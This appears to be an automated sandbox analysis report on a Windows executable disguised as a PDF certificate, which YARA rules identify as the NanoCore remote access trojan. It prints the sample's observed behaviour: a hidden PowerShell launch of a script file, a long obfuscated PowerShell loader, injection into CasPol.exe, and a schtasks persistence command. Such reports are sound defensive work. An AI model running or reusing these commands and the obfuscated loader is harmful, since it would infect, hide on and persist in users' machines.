Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@13/15@189/2

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_0040336C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23D62EE2 AdjustTokenPrivileges,	5_2_23D62EE2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23D62EAB AdjustTokenPrivileges,	5_2_23D62EAB

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046FF

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

File created: C:\Users\user\AppData\Local\Skamflelsens

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:304:WilStaging_02
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{48e0e383-40c8-47b1-a4ea-d717ed94d829}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:304:WilStaging_02

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsk2A12.tmp

Jump to behavior

Source: Certificate#U00b7pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Certificate#U00b7pdf.exe	ReversingLabs: Detection: 31%
Source: Certificate#U00b7pdf.exe	Virustotal: Detection: 53%

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

File read: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Certificate#U00b7pdf.exe "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4F	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"	Jump to behavior

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: wininet.dll	Jump to behavior
